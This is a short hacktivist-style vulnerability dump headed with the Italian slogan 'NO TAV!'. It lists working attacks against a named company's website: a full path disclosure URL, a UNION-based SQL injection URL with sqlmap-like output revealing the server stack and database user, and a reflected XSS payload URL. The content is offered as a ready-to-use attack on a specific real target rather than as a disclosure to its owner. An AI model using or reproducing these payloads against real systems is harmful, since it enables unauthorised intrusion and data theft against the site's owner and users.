NO TAV!Con Sole e Baleno nel Cuore--- Full Path Disclosure http://

1. NO TAV!
2.  
3. Con Sole e Baleno nel Cuore
4.  
5.  
6. --- Full Path Disclosure
7.  
8. http://www.ltf-sas.com/index.php?lg_visite=aaa
9.  
10. Apache/2.0.54 (Win32) PHP/4.4.0 Server at www.ltf-sas.com Port 80
11.  
12. --- SQL Injection
13.  
14. http://www.ltf-sas.com/pages/articles.php?art_id=-1%20union%20select%201,2,3,4,5,version%28%29,7,COUNT%28*%29,9,10,11,12,13,14%20from%20ltf.articles
15.  
16. [19:17:55] [INFO] testing MySQL
17. [19:17:56] [INFO] confirming MySQL
18. [19:18:00] [INFO] the back-end DBMS is MySQL
19. web server operating system: Windows
20. web application technology: PHP 4.4.0, Apache 2.0.54
21. back-end DBMS: MySQL < 5.0.0
22. [19:18:00] [INFO] fetching current user
23. [19:18:00] [INFO] retrieved: ltf@localhost
24. current user: 'ltf@localhost'
25.  
26. --- XSS
27.  
28. http://www.ltf-sas.com/pages/search.php?recherche=%3E%3Cscript%3Ealert%28%27NO+TAV%27%29%3C%2Fscript%3E&imageField.x=0&imageField.y=0